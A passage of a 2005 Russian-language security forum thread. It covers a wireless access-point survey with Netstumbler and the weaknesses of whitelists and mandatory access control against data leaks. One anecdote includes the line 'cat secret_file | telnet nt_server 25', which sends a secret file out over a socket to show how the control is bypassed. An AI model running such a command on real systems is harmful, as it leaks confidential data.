23.11.2005 12:24:06
Рассматривались все, которые были слышны при проведении исследования.
Угу. И сколько по москве таких сетей вы знаете? 2, 3, 5?
Как вы могли догадаться, Netstambler не обнарживает точки доступа, не отвечающие на probe request. Карточка - в основном SMC Elite Connect (200mw), со стандартной внешней всенаправленной антеной (5db, или около того). Вокруг зданий с безопасными системными интеграторами кругов не нарезалось.
А можно на результаты посмотреть? Хотя бы в первом приближении?
Если уж заниматься буквоедством - как ципсет характеризует чувствительность карточки? |
|||||||||||
|
16.11.2005 18:46:32
1. Держать список "белый" список сервров практически нереально в корпоративной среде.
2. Распостраненность уязвимостей типа XSS делает подобную защиту малоэффективной. 3. Всегда остаются другие каналы (почта?). 4. Не вижу, как здесь может помочь "мадатные" системы, пускай даже Белл и Ла-Падула вместе будут её претворять в жисть. ЗЫ. Анекдот одной "мадатной системы", имеющий кучу сертификатов,запрещавшей копировать документы одного уровня в папку другого уровня, но забывавшей о контроле сокетов (типа cat secret_file | telnet nt_server 25) |
|
|